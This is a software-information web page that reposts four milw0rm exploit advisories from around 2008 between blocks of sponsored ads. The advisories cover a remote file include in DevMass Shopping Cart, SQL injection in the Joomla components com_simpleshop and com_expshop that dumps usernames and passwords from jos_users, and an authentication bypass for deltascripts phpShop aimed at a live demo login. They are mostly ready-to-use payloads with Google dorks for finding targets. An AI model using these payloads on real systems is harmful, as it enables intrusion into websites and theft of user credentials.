Software Information Details

Sponsored by :
Fast & Easy Club Flyers in Full Color at imageMEDIA.com
Save 20% sitewide on all mobile apps at Handango with code SAVE20NOW
Find and Choose the Best ANTIVIRUS protection for your PC and Save Big! Expires 16.01.09
Wedding Dash® 2: Rings Around the World is available for purchase from Shockwave!
Free LinkShare Membership! Enjoy the benefits of partnering with 400 top online merchants.

====================================================================
||  ##    ##   ##           ##########   #######     ########     ||
||   ##  ##    ##########   ##########   ##   ##     ##           ||
||    ####     ##########   ##      ##   #######     ########     ||
||    ####     ##  ##  ##   ##      ##   #######           ##     ||
||   ##  ##    ##  ##  ##   ##########   ##    ##          ##     ||
||  ##    ##   ##  ##  ##   ##########   ##     ##   ########     ||
====================================================================
====================================================================
[*] DevMass Shopping Cart <= 1.0 Remote File Include Vulnerability||
[!] Download   : http://www.devmass.com/downloads/                ||
devmass.cart.1.0.tar                                              ||
[!] Author     : S.W.A.T.                                         ||
[!] Site       : wWw.XmorS.CoM - wWw.SvvaT.IR                     ||
[!] Y!ID       : Svvateam                                         ||
[!] E-Mail     : S.W.4.T@hackermail.CoM                           ||
[!] Location   : Iran - 071                                       ||
[!] Risk       : Moderate ( High )                                ||
[!] Dork       : DevMass Shopping Cart                            ||
====================================================================
====================================================================
Vuln. code: admin/kfm/initialise.php         	                  ||
                                                                  ||
require $kfm_base_path.'includes/lang.php';                       ||
require $kfm_base_path.'includes/db.php'; 	                  ||
require $kfm_base_path.'includes/object.class.php';      	  ||
require $kfm_base_path.'includes/session.class.php'; 		  ||
require $kfm_base_path.'includes/file.class.php'; 		  ||
require $kfm_base_path.'includes/image.class.php'; 		  ||
require $kfm_base_path.'includes/directory.class.php';            ||
                                                                  ||
                                                                  ||
====================================================================
[*] Exploitation :                                                ||
                                                                  ||
[target]/[path]/admin/kfm/initialise.php?kfm_base_path=[Shell]    ||
								  ||
====================================================================
[!] We Are : Scorpiunix - Kamy4r - S.W.A.T. - D3vil_B0Y_Ir -      ||
[!] The_Editor - Silliconic - Sh3llH3ll                           ||
                                                                  ||
[!] I Love Xmors & All Member Of Them                             ||
							          ||
[!] DeltaHackingGroup = ( Lammers Group  ) ,,!,,                ||
							          ||
[!] Special Thanks To : Dj7xpl From Y! UnderGround Group          ||
								  ||
[!] Tnx 2 : Str0ke - Google - SourceForge                         ||
====================================================================

(Captured From milw0rm.com)

Sponsored by :
Fast & Easy Club Flyers in Full Color at imageMEDIA.com
Save 20% sitewide on all mobile apps at Handango with code SAVE20NOW
Find and Choose the Best ANTIVIRUS protection for your PC and Save Big! Expires 16.01.09
Wedding Dash® 2: Rings Around the World is available for purchase from Shockwave!
Free LinkShare Membership! Enjoy the benefits of partnering with 400 top online merchants.

###############################################################
# joomla com_simpleshop SQL Injection(section)
###############################################################
# AUTHOR : S@BUN
# HOME : http://www.milw0rm.com/author/1334
# MAİL : hackturkiye.hackturkiye@gmail.com
################################################################
# DORK 1 : allinurl:"com_simpleshop"
# DORK 2 : allinurl: "com_simpleshop"section
################################################################
EXPLOIT :
index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section&section=
-000/**/union+select/**/000,111,222,concat(username,0x3a,password)
,0,concat(username,0x3a,password)/**/from/**/jos_users/*
################################################################
# S@BUN                i AM NOT HACKER              S@BUN
################################################################
 <mosinstall type="component" version="4.5.2">
  <name>simple shop</name>
  <author>galore.co.za</author>
  <creationDate>July 2007</creationDate>
  <copyright>(C) 2000 - 2007 galore.co.za</copyright>
  <license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>
  <authorEmail>info@galore.co.za</authorEmail>
  <authorUrl>www.galore.co.za</authorUrl>
  <version>2.0</version>
(Captured from milw0rm.com)

Sponsored by :
Fast & Easy Club Flyers in Full Color at imageMEDIA.com
Save 20% sitewide on all mobile apps at Handango with code SAVE20NOW
Find and Choose the Best ANTIVIRUS protection for your PC and Save Big! Expires 16.01.09
Wedding Dash® 2: Rings Around the World is available for purchase from Shockwave!
Free LinkShare Membership! Enjoy the benefits of partnering with 400 top online merchants.

/---------------------------------------------------------------\
\                                				/
/         Joomla Component expshop Remote SQL injection         \
\                                				/
\---------------------------------------------------------------/
[*] Author    :  His0k4 [ALGERIAN HaCkEr]
[*] Dork      :  inurl:com_expshop
[*] POC        : http://localhost/[Joomla_Path]/index.php?option=
com_expshop&page=show_payment&catid={SQL}
[*] Example    : http://localhost/[Joomla_Path]/index.php?option=
com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,
@@version,concat(username,0x3a,password) FROM jos_users--
-----------------------------------------------------------------
[*] Greetings :  All friends & muslims HaCkeRs...
[*] Greetings2:  http://palcastle.org/cc

(Captured From milw0rm.com)

Sponsored by :
Fast & Easy Club Flyers in Full Color at imageMEDIA.com
Save 20% sitewide on all mobile apps at Handango with code SAVE20NOW
Find and Choose the Best ANTIVIRUS protection for your PC and Save Big! Expires 16.01.09
Wedding Dash® 2: Rings Around the World is available for purchase from Shockwave!
Free LinkShare Membership! Enjoy the benefits of partnering with 400 top online merchants.

[~] deltascripts phpShop Remote Auth Bypass Vulnerability
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~] Date: 06.11.2008
[~] Home: www.z0rlu.blogspot.com
[~] contact: trt-turk@hotmail.com
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] dork: "Powered by PHP Shop from DeltaScripts"
[~] -----------------------------------------------------------
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://demo.deltascripts.com/phpshop/admin/login.php
example for demo:
admin: admin ' or ' 1=1
passwd: ZoRLu
[~] -----------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~] yildirimordulari.org  &  darkc0de.com
[~] -----------------------------------------------------------

(Captured From milw0rm.com)